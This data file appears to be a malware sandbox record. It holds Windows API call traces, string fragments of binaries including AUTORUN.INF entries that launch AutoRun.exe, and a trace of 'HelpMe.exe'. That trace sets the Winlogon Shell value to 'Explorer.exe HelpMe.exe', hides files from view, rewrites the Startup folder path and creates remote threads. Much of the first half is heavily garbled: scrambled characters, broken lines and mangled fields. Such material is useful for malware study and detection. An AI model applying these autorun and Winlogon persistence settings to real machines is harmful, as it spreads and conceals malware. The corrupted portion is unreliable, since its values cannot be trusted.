6(',"9
du73,&C66d0d51e
3fc<76Bd1bf-d442d6bdba81:0fc24b8da7
3'38",
{cu-%fB#CrlateG
$!8#,"ZUCcESS","0x00000030","lpDileNam
CEQOEXI
,uy-ehNewDlsird
dss$>GeNERIC_READ | FENERIC_URITE"
2!4121f
;)#dju]58"%"9de
ge6jeb
76d9d51d79bc2gc574bd1`fdd442
:!=0fc
5$5,dhJ0761","g
xstlm"
"CreateFileW"-"SUCCESQ","0x0
a2)"lp
H]PIYE\lr
#,"mwDEsiredAccess->FENERIC_PEAD | O
AORRITi
2!8xyuU312826.2
qfI#17=8"
"9dd688cfe6cec376d9d53d79bc26
f!gfdd@
idSgc2=b:D`7447","1768","dewice","Devi
1#,"+, HEevi0e->0x00000125","dwIoCon
m|Fode
hkA-"lyIlbtffe.->0x00000000#,"nInBuffez
kj`->0X
qOu}BwFger-b0x0120f37c",#nOutBuffer
xu(>0xh
2(#dk(
CytlsReu
e->9x2
20f3~4","lpOvdrlarped->0x000H
jm89"%"1
h}8dd?88Cfe6ceb376d9d50d79bc2fa574bd1
0t3bdc
a"5*q =644m","0
-"f`lgSyste$","CreatdFilgW","SUCCES[
2 5001
;le-7\\.]
>15uPo`nvmanag,r","dwDerirefAccess->AT
3!3yzuj7.309",#
pa#,"0dd
88cfe6ceb376d8d51d79ba2fc574
f$12d6
: g+up49da>44d#
eu`78"%"dEvice","DeviceHoContron","FAI
 2)"hDa
< yxxtd112=","e
nnt{olcode->0x006d0018","lpIlBuffer
6)gb00n
@eg.#6
hze$>0x1
vtc146+,"LpOutBuffer->0y00498782","nOu
pClze-
2 1zwf|#lpKyter
"0$snem->
x0120f374","lqOverlapred->0x
3!3yzu|7.309",#
pw#,"0dd
88cfe6ceb376d8d51d79ba2fc574b
f$12d6F
: g#qt.9da>44d#lku{78"%"dew
*!o-"DlviCeIoControl",#QUCCESS"/"","hD-
2 5012L
B/-48nlCfde-?p1tz7d0908"-
oBuofeR->0x0049bb00#."nInBufeerSize
6&',"l
dvd2n~xy00=8611pkhjoOu}Bufg
 {e-70x
00000ee","lpC{tesRetuqned->0
.2ipOvM
-w100900
"20190111212126.398","174h
.2<dd6P
c"8d58d7
rc2fc574bd1bfdd442d6beca8180
0$g8da
qi#renisTsy","RegOpenKeyExW","RUCCESS
  }000
,=n?HKLY_CT
U_UZER
-"lpSubKey->Snftware\Oicroso
Tus; +,]Exylmrer\M%untPointr2\CPC\Volume"
0 4901i
0&/{p}c-"1>4:","9d.688cfe6cdb376d9d51d79bcJ
a%24bd
6"e~+ #`8110dc24b8.a744d","0768","registry
 B`gOp
jBCEZS"
#0x00000138","hKey->0y000001
 <'lpSu
j0Z792$8e
0-11e1-9999-806d6172686f}\"
0 4901	
-"1>4:
-"9d>688cfe6ceb377d9d51d79bcj
a%24bdA
:7_`8110dC34b8>a744d","1768#,"registry
 B`gQu
#SUJCESRbef
-"hBey-?
10083:
alueNamd/>Dawa"
"20190
1)<","
 )e$ux
bfe?ceb2w
e51m79bb
64bm1`Fdd44{d6bdca80:0fc14b8da744d"
gwlstr)
SxEx^","R
sRS"%"0x1
038+, HKey-wHKEY_CUSPENT\USER","lpS
vgdre\
)Zeowz\Cus2,*@Werzion]
)4Ynre{\OOuntP&ints2\CQA\Vooume"
4>699",
 <#y'$
98coe6cd"zs
e9d<1d78
2vUb57=bf
bfdd}42d6bdc`:180ec24b8da744L
 b`gis,
3%^JeyLxW"-b
sBESZ","1
101;4 
"hKe0->0x00012138!,"lpSubKey
0==e41
;)8ynx
7d687268v/9r#
312824
399"e"1748",#;dd6;8cfe6ceb37
a"cc57<
ft5tq$
cdch8181&*v
c8dh744e
668+, Regis=ry","RefSuerzValueExW",
 2)"hK
2 1psq
5",+lpV`,<!d`me$>Geo
#%_hon+
2019y111212134.39:","1748","
aug376
5)c#q&K474kd1bg$-p
3d6kdca9
itOb24k8fA744dk,"1768"- filfsystem","C
 <'SUCS
  ypsp
112=","m0
-JdNade->]
jnun}PmIntMa'ager","euDesjredAccess-
3"0rrr
/390","0w}|
-"9md689
beb:74D9d51-79bc2fc454bd2bfdd442d6b
6r=da7
3'7:!('bb~`in.!,Kugice[|C{{beot;6"]]TRJrE"
NcM_CHI
"dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBuf\^rSize->0x00000208","PMqJ4
7%" r->0x0vsqp/
|obmnOutBu677!
<,2ug0x00000008","lpBytesReturne>vbm&0120f884","lpOve-
apped->0x00000000"
.22748
4(9K!!
beb:76d8T}uE69bj2fc4
s&F0bfmd4
2d6bdca8180fb
ea7=4d
,"1768","fildqystem"/&Create>
Q2)"0x
e(lGillNamd
A/\MfuntQ
.*jLanhgeR","dwDesired@
+!lr->HTTrIBUTES"
"200;0111211526.399
:(ffe6W
y$!8bc;fc56
+ &cfdm442e
*iz`8110f`3
%5|`74=d"/#
gx##,"demOpy","Virtual@
<!yDx"%"SuACESS","0x00047400","tm52Pro
nu(>He
j,`@dd{ess,
y8!116=000#
jidRizl->54
t;0-"feAlon
1:|nnTppe
<0x00001000"-
6"Dsotlct
<0x00000004"
!6019011441212
du3cebg
}Mi3fc<74
&Ioe44;d6
<90fj24
85d"%"1
qp,gillsySuem","ReadFim
qp-RUCJESs#,"","hFile-?2{400005ec","nN
rv536.:99"-
rs19",+9dd7
*'ad6clb347L+ 30d70bc1g
ds=cd1kffD642dybdca8181
2v<c8dh76
f","~768","fhnfwysqcm","Writy
Dyie->L
fe"oNudbe
0udsTfWr
~d40449"
*#201901112120
et089"%"1
58","9dd688cgg6ceb375`9d51d7
ft142d
3(1N*v4c8dh74
ef0668+,"
? {rted",
SeadFile","ST
PR",+",
iFile->0x000120cc","mJumberOB
4!140"a
212?.3y8
748+,"yeL6
cfe?ce"2
d51m79"b0eg574bd1bf
2va24b
8",+fi
em"%"W
le"%"SuCCESS","","hG
>0x900
0130","nNumbdpOfBytepPoWrite
; 4112	
748+,"
cfe?ce
d51m70
c2fc57
bd1bfe
d6bmca
080fc24b8da75
"17?8(
"fil-s
stem"-
dFiee 
"SUCmESS",""- kFmie->0~00000L
Pudd->
01182120
99"%"175
9dd?8:Cge6c?b376d9d4
bc2oc7
5bd18fdd442d7`dcb<180fc24b8dq
 vlles!
.2VZ 0
Fill","Re
SS"%"",#
e->9x2
1001i0","nNul
fBy}eqtnWri.e->61441 
!60190111212
 <'9dd
d9d<1d
c57=bd
42d?bdCa8180fc24b8d`
","876
","filesystel ,"ReadEmle","S
k|`->08
Numker
sTo[ea
112828
6.399"
"1748#
d681cfE7ceb376d9d51e
2fc<74Be1bfdd442d6be
80fj2>B8da7|4
","177
fills{Stem"
"WriteFhnf&)$SUCCB[S","
MvGyte{
112821
","874
d681cf
76d0d5
e79bc2fc574be
d44;d6Beca8180fc24b9
4d"%"1
68","filesysu
"RehdFIle","SUCCESS#
"hF`lg
>0x0u0000cc"-
mbe{Odbytes
oRead->73700"
%:9;9011u
;t01d7=
7'5J-u
fdd=42
8189fc
744m",
,"f`le
","^riTdFile","SUCCD
"",+hFIme->0x0000012
nNudbeROfBytesToWriu
*"201901112120
99"%"3
48",g9dd688cg
b37?d;D51d7|bc2fc575`g5bfab3<;n6bdc)
.2WeadN
","gNUmc
BytlstoS
79bj2Fc4Ww"
da7=4D"-Brw
8",+fIld
em"%"wrh
le"%"sUB#
,"nGuMbd
ytezTOWs	7%
8;cfeN
4t9d51d79bc2fc454bd1bfdd442d6bgga8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->44<18"
%201108;12:212:.>99""">'483,"9vd%88cre#ueb3 6d9|51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","
8",+9d$7X8I
e6clb3w7f9d51d79bc2
f!`fdd
fc25b8%`?4
","076y#$"A
lesxst$l*,
ritdFi-d*,>
UCCFSS
hFioe-~1p0
001:0"l#
berGfB9u
Wri|e-~3F8"
"2819p0A12
212>.3y8*,"
748*,"yel68
cfe>ce"2?6d
d51l79bb:fc
74bl1bfe
d6bmcax0@0f
24b0daw5Ld
"17>8"l#
sys|emb-ZWr
teFaleb-ZSU
CES[",b#T"R
ile%>081H
130*,".O}mb
rOfByt-r\oW
ite->2~9 
'266988;:212=?6.399""-1748",2(vw"-.tfe6ceb376d9d51d79bc2fc57,{d1bfdd442d"
0!392'
399#,"q6<82
"9de68xbne&
eb366dye=1t
9bc;fcu6<bt
bfde44re>bt
a8190f#36a<ag744d",
mfgFil!
fzux-W",#SUCBMCX},""-"lpDcis
ingNileOimeL>C:TAUTN^XE!.BA\.exd*,"
FildFam
->C2\AUUAEX C.BIT"
B20W9011121392'I399#,"16<%,
"9dm68
bn{8Ieb3>6d
9bc;fc
bfdm44
a8100fc3<b8
a74<d",#976R","nilerqst
m",*Cre`oeF
STXCE>S",*0
01800_30"%"lpGv}n!ame$>C
Run'ex
Des`re
s->NEN
SVRT!EAD+
3/ 2D111;12
3)?8L9",+17
9==)Odd618c
376m9d
c2fj57
dd4=2d
c{rjB180oc2
c'ujL44d+,"
6)))P"fiees
rktf_,"Rlad
hst)R"SUJCE
:,"hNile,30Q)0008130#!"GTumbmrOfCttLhToRmad-??6
":0191<1
/121:6.384"
<1740","8id
'8cfm6cec>7
D9d59d79cn2OB574jd1bgid
2d6jdca9<8
Ec24j8da694M
,"1?68"-/f@Iesy{tem#!"jTeatmFildZ"
SUCKESS#$"?
000901
pFieeN
:\A\TO
F",+dw
dAcjes
ERIJ_R
"20890
126'39
48"%"9
fe6jeb
51d>9b
4bd8bf
6bdja8
4b8ma7
1761",
ystlm"
#ZeAfFilm*,#R]CcFSS"$*"
e->8x0018; 
0",+nN
ljeRMfBy|usUnZeAg->2>("
9019121399'
399;,"
6<))9"9dm68
eb3.6d
9bc+fc
bfdm441e>iu
a81!0f
a74=d"/#9
","oilfrq|
m",+Cr
leW+,"
TMCE6S",*0x018;!
30"5"l
ame$>C:]1ko
88coe6
d9d<1d
c57-bd
42d/bd
fc2=b8
","lwD
Acclsq
>GENDRIC_REAE*
201003
26.399"-*:&
8",+9f
688cge6ceb377l2u
1d70ba
bd1bfdd561`6gbdi1120mo?:m(us$ !r","176/:58}ilesenjzM
gWCF\LFCGe{","SUnmjcb
AS)*>4 :7*$29=Xvv_LO
stem"D
Mz pH;)
xumD2h
I2 hI2(
2!&C <^
<  E2$
c#@V.2
F;sWJ:2
xuAN2h$@2 
_3 FC ||-{d
2!f]d(
r_:	p|
Y3!u[3"
^ftr_:s
a"7b8d)
.20??7#,"rtgi
uzr3-"RevCr
`|jBdyExF",
R]RHDSS"="0
1124","
?HKEY_C
SZEnV_USEV
,#dpsvbKey)
nn}xere\\ic
n{dwp\Wi
rTL|vreneVe
ra~eXExp}or
sTLNqntPoin
r:_Xe20cd69
9810"=06d'17
71=wx\"
01?84121#12
/;(2',"1&48
-*8Ea688cfe
26d9d51
61bC0fc575
d0jfDg442d7
bi1>>0fc#4b
ei<%2d",317
9*#+tegibtr
#$3YcgSeeVa
tmDYQ","SUC
*"","hK
z00002
opValw
`el"9BastCl
r{)=%dwThpe
?9-%%lpDpta
?Lcbqe",3cb
6112121
7&391","17
8#$+6md68)cf
7kns:76d(d5
e?6kj2fc$74
e9smmd44#d6
880fc24
=4d","1
70",(regis
rx*%-YegOaen
dqNi\","BUC
D[\+'"0x!00
19#?),"hZey
?@JdR_CURRE
UWVpNR","lp
tjKeu->Sof
w`zlS@icrnsofuT\xcdowr\CuszjgyVerrion]Mi{aores\Motfuqbints2\CQK_ublume"
#:01701112
<99","
29dd68
gm6Ugb376d9e49d
:bc2fc5
5jd1sfdd4
d7jdcs8180
or744e"
"0?<(6,"rdgiruzy!."RegOpdoCe|GxW",
STBK~kE","Px0018
	%c",FhKex%	
o000P0125*
Key,3{I*0cd692,9h4
411e1-9884-
*6d617278;fUG"
"2008=1
-212126/249
1"1748"-#4dL(88cfe6bdo3
)d9d51d68oc
Fc574bd0ckdL
42d6bdb`51
fc24b8e`:4
G","1769#!"ZAgistry#-/RMBQueryV`mxem^W","SUBBHS{
,"","hJdq$1
x0010012k)=
lpV`lueOidj
12136.
1749",
8cfd6c
c;&=N9d50d7
ck-zI574cd1
2d6cdc
99(/Lc24c8d
,"1768
-*POZtem","
niGz@braryA
-*pcjCESS",
c0000"
#dSp@leName
?[kseL32.dl
019011
d790cfQ6ceb
77e1d5
d79bc2fb=74Td1bfdd45:U
Hdca818
H8da744
68","s
,"Load
hjEYEyA"L"S
BKrkd","Tx7
0",BlpFhd]yYme-Zolf2:/EDl"
"20013
1212126/;
,"1W48"-*
fe5bmU
51d61U@
fc5S4bg0jG\_442
0fcV4b;ei6
d","17
Xegistr
#&"PYgOpenKdxOxW
,"SUCCDR[
>ICM_`CLASSER^ZOO
","lpStcAe{l>Dir
cwnxy"L
930?12s2126.398,,#r748","9ej68|cfe6c
b2=6d|d51d
9ab:fbs74bd1
fel45ud6bdc
8000f+24b8d
e"176:",#
eO#stry
,"Shgg;enKe
rhKey->
`013e",
mxrt3Key->Cus^Ass
"2019181
`12126.285"
q1748",#8hd
l8cfe6
79d51d78ck	G3574bd1
d2d6bdc
7c24b8da6<
_s,"1768"-,re2istry",#Zeg
penKeyEy_",uSUCCESS#$"0 00000127*,"1Key->0x1800j13e","lq[ub
ey->(numd)"Q
"201900912l2126.398*=)$748#, 
dd68;cfe6ceb2?'o,d51e7;
c2fc074bd1bfel44
d6bdc`<180fc2
da75<d"
"1768#("regisDrH","Shgg=enKe9D|W","FA
RE"- !('nLmp'5DFKVO]]PUYIZYZRRRX<3
MRpQGme^
yDJYwO]Um
ZWrZEX^MfliRYQH3
667#)<
/9?$!!
=?=6?2+
CPSU\VVYXXZ^\\Y^BKJVYTFOMBYP_G
puL,ksR
0 MY2!
2!mP3!
fft2g:s.
j0t~<fs
w bQ>kct%{2DwPu
wuj(Tq
,#mr <
f%u.5)n)0v`574
f$5:n&vdca9180gky9
;da644g","1768","refast
y","RegP}er
UalueExW","k
BSESS"
cz@	/:
pCDTpq4
-2lpVaBJ$
"20190
0"7.39/","3748 ,"9gd68:cfe2ceb+76d<d51i79be2fc<74bc1bfhd44:d6bhca8880fo24b2da734d"'"17>8",.reg
strt","DegO
enKgyExG","KAILDRE">"",0hKe{->HjEY_AOCAy_MAAHIN
","apSu!Key/>So6twace\M;cro~oft
Winiows
Curdent
ersbon\<olinies1ExpLore
>201K0118212726.%99"
"17>8",
9dd<88c
e6clb37
d9d#1d7
bc2kc57
bd1Kfdd
42d;bdc
8182fc2
b8dj744
","<768
,"rtgis
ry"."Re
OpeeKey]
W" "SUOCES[","
1 0001
&"lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Expl
3)1011212126.39)","1748","9dd688cfg6cec376d9d51d79bc2fc574bd1bfdd462d6`dca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000140","lpValueName->ForceActiveDesktopOn"
"20190111212126.399","1748","9dd68MZ
!This program cannot be run in DOS mode.
@.rsrc
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
   <0  <$  rsds
SetupResources.pdb
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assemanyp
m5ny=(u
mas-microsofti;N=
"Mman;f
]  <trustInfo xmlnrm
crosogt
om:asm.v
    <Nd
urity>
    !m<!eQu6s
equested
}tionLXw
l level5"asIo;o8eR"su
/@equestedExecuv9znge
 </requestedPqkv9
ecurity>
%ft~nun0
D9N5X7P&D6I+G#A7DzNuXXPADDINGPADDINGXZ
I]F@A,DIN
PADDINGPADDINGXZ
f=7\6E6u6
9$:(:':n;
<O=6=9=
9!:5:M:q
;P;T;X;T;`;
3.4X4XdH5
3n4q4{4g4
4}4q4U4O4[4I4U4Z4
4P4)4-4<484)4"4
4C5H5?5&595
7_:Z:Q:P:,:!:f:L:P:U:
1O2\2^2/2$2l2
3n363Z3
3'4Y4ad
4\464~4v4x4
7W767X7
8m9'9!9=9
9O:>:F;@;F;
5]6&6m626
7c7C7W7
7e8W8S8;8
8k9c949E9
:l;<;P;!;
=&>(>M>X>g>
232Q2H2>2(2
5"6d6w6j6A626{6
z0G0 0/0
0!1y1E1B1=1
5G5V5f5
7.8c8k8Q8+8
91:`;];
<6<:<<<><D<^=
;q<q<6<
>1>?>E>k?
7!8L8m8wh
2y3;3<2N2$2
2$3X3z3|3L3K3
3r3R3!3r3i3`3f3p3y3
4&4+4<4D4J4Vdy4b4F5j4
4i5q5j7g7.7H7
797;8o8x8
;H;[;8;
=@>H>`>
606S6v6
7C8B8;8
9&9I9l9
j:^;K;&;
;l<-<M<m<
>i?(?C?j?
202P2k2
4 5"5#5
5t5K5%5>505
6]6X6,6'6!6
6e7s7I7T7\7]7d7q7R7l7y7q7
7f8b8i8W8T8K858,8(8
8P9_9\979?909x9
9`:o:y:V:H:D:
:+:8:8:3:
:w;};c;x;F;_;
;U;);:;0;
<I<G<Q<+<w<w<p<D<$<
<r=u=v=M=J=[=H=+=1=w=
=i>->z>K>E>J>S>m>j>}>l>T>~>s>
>F?K?]?{?
k0D0J0
0?1Q1B1P1(1
1b2c2s2R2j2:272@2
2z3O3D3X3U3|3
4G4p4$4>4
4u52545%5"5W5
5L6=6*6!6+6
6L7#7.7<717
:!;#;=;0;
=I=D=T=
|0p0E0F0>08000H0
2$3p3p3C3
4A4!4u474
8d8o8o8f8
:w;M;E;
;};u;+;`<%<=<.<
=L>E>E>R>
>v>'>H?
3r4~4K4A4%4
9F9n9<:u:`:|:K:
;6<b<@=@=I=n=1=
=w>h>M>
2}2E2*3
GV9:D([l@
7?7E7J7T7j7
8M8S8X8b8
8Q9u9{9
=)=F=L=Q=[=q=
>B>H>M>W>x>~>
>-?R?X?]?g?
=0b0h0m0w0
0M1r1x1}1
4V4\4a4k4
9v|\=H
F[EMUQ
MdYfvDJf{rdt
BU\kr4G[|qB	UW_&
}u?dnQ*_
frOQDvfTSDDZUs}D
b!Q/S/Wl{4
v}-F0]
3.(.45
8hpY@^WJm
GaRJ_xSo
QdsmYmF.
ZPAAQGM
!?9	rPYAIG%
P$@$m5Y
&a`_xSBWvTqBT_DRAXaXXZo
[nguS4||
bSMB5D
fqUv^<R
HlPonR%d Ye="SET\
[FSh_{
o|-[8O
T&O>T<W=I
xU_@KJ[
klYpIn(\?
vePpDzT,xt
6~iEL^
gaJ\WBAY]ZA~[PW3{*F$m}
Ut@vP68
<,sqTl@nP
zYA\Z[^wXO|.A(jy
Q<i?Xy
&u}N`U
QPlWH{
|MVMIeTDVk
!1q2@t
GUiQmcCRTYy]vXX]T]
YaIqOm
RXyIiOA
QMMePDRk
.p]K\P[T
v%Q0E:Uly4
IEIpTfUiU]_l]
}TFA]B`UT
]DP_|^ATj
{FL_/X
X]EEu!D!T
hYZWX'\;j/V
2|z!]<I"Ytu
kiSBT$X?t>I4bm
RoPo{^|cICV6y5S
=FeiDyBu
I<A?py B1Y2d
Euqq[yDv
f]EL]JI
5053xu8N
W@TFOyC0T
165xz-]
YSNEZESWt
48qxJ%Q>l1X|w
hlewyfD
Q;i8T~
6}mFL]KY
tmRxFbV&>
4 4$4h4l4p4x4|4
5 5(5,5p5t5x5
5 6$6(60646x6|6
6074787<7@7D7H7L7T7X7
9<:@:D:H:L:P:X:\:
= =$=(=0=4=
rqJdQcU]kQ
?Pv`?d?h?l
dP1T1\aad
PxX{\2
c}MPWZM
V:\`\-3WQ
1\Command=AutoRun.exe
shell\2\=Browser
shell\2\Command=AutoRun.exe
shellexecute=AutoRun.exe
AUTORUN.INF
!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
[QsrKPs
RsaTQs
TQs\BDs
QssADs
QsmYOs
KDs0XQsaUQs
UPstEDs
UQsPOQs
Qs"DDs
Left  Project1
 =   12
xCAT - Anti-Shutdown v1.00
Command1
Label5
Shutdowns stopped this session
Label4
Label3
Shutdowns stopped by xCAT- Anti-Shutdown
Label2
Label1
mnu_home
mnu_allow
Allow Shutdown
mnu_sep1
mnu_shutter
Shutdown
mnu_logoff
Normal LogOff
mnu_forcelogoff
Force LogOff
mnu_eferferfer
mnu_reboot
Normal Reboot
mnu_forcereboot
Force Reboot
mnu_nullzzzz
mnu_manual
Normal Shutdown
mnu_force
Force Shutdown
mnu_null1
mnu_about
mnu_exit
antishutdown
Project1
Project1
Project1
mdlStopShutdown
Module1
Module2
mnu_reboot
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
mnu_shutter
mnu_eferferfer
mnu_force
mnu_allow
mnu_logoff
mnu_manual
mnu_exit
Label5
mnu_nullzzzz
Command1
Label4
Label1
Label2
Label3
mnu_forcelogoff
mnu_forcereboot
mnu_about
mnu_null1
mnu_home
mnu_sep1
shell32.dll
Shell_NotifyIconA
ExitWindowsEx
user32
CallWindowProcA
SetWindowLongA
GetMessageA
VBA6.DLL
__vbaFreeVar
__vbaVarOr
__vbaI4Var
__vbaSetSystemError
__vbaErrorOverflow
__vbaStrCopy
__vbaRecUniToAnsi
__vbaFpI4
__vbaOnError
__vbaStrI2
__vbaStrI4
__vbaI4Str
__vbaFreeObjList
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaFreeStr
__vbaCastObj
__vbaObjSet
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSetAddref
__vbaNew2
__vbaRecAnsiToUni
__vbaLateIdCallLd
__vbaLsetFixstr
MSVBVM60.DLL
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaFreeVar
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaStrCat
__vbaLsetFixstr
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
DllFunctionCall
__vbaVarOr
_adj_fpatan
__vbaLateIdCallLd
__vbaRecUniToAnsi
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaErrorOverflow
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaI4Str
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaI4Var
__vbaFpI4
_CIatan
__vbaCastObj
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeObj
__vbaFreeStr
chrome.exe
[autorun]
open=AutoRun.exe
shell\1=Open
shell\1\Command=AutoRun.exe
shell\2\=Browser
shell\2\Command=AutoRun.exe
shellexecute=AutoRun.exe
AUTORUN.INF
"20190910075315.543","612","HelpMe.exe","1984","memory","VirtualAllocEx","SUCCESS","0x01110000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000040"
"20190910075315.543","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910075315.543","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910075315.543","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910075315.543","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910075315.543","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910075315.543","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910075315.543","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910075315.583","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x00000088","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ"
"20190910075315.583","612","HelpMe.exe","1984","filesystem","ReadFile","SUCCESS","","hFile->0x00000088","nNumberOfBytesToRead->268"
"20190910075315.583","612","HelpMe.exe","1984","filesystem","CreateFileW","FAILURE","","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910075315.593","612","HelpMe.exe","1984","memory","VirtualAllocEx","SUCCESS","0x00a90000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000004"
"20190910075315.593","612","HelpMe.exe","1984","memory","VirtualAllocEx","SUCCESS","0x00a90000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00a90000","dwSize->257","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910075315.603","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000080","hKey->0x00000094","lpSubKey->Software\Microsoft\Windows\CurrentVersion\ThemeManager"
"20190910075315.603","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x00000080","lpValueName->Compositing"
"20190910075315.603","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000080","hKey->0x00000094","lpSubKey->Control Panel\Desktop"
"20190910075315.603","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x00000080","lpValueName->LameButtonText"
"20190910075315.603","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x5ad70000","lpFileName->uxtheme.dll"
"20190910075320.550","612","HelpMe.exe","1984","process","CreateRemoteThread","SUCCESS","0x00000094","lpStartAddress->0x00404008","th32ProcessID->612","szExeFile->HelpMe.exe"
"20190910075320.550","612","HelpMe.exe","1984","process","CreateRemoteThread","SUCCESS","0x00000098","lpStartAddress->0x00404008","th32ProcessID->612","szExeFile->HelpMe.exe"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegCreateKeyExW","SUCCESS","0x000000a0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegSetValueExA","SUCCESS","","hKey->0x000000a0","lpValueName->Shell","dwType->1","lpData->Explorer.exe  HelpMe.exe","cbData->25"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegCreateKeyExW","SUCCESS","0x000000a4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegSetValueExA","SUCCESS","","hKey->0x000000a4","lpValueName->CheckedValue","dwType->4","lpData->0","cbData->4"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegCreateKeyExW","SUCCESS","0x000000ac","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000ac","lpValueName->Startup"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegCreateKeyExW","SUCCESS","0x000000ac","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegSetValueExW","SUCCESS","","hKey->0x000000ac","lpValueName->Startup","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup","cbData->130"
"20190910075320.560","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b0","lpValueName->NoNetHood"
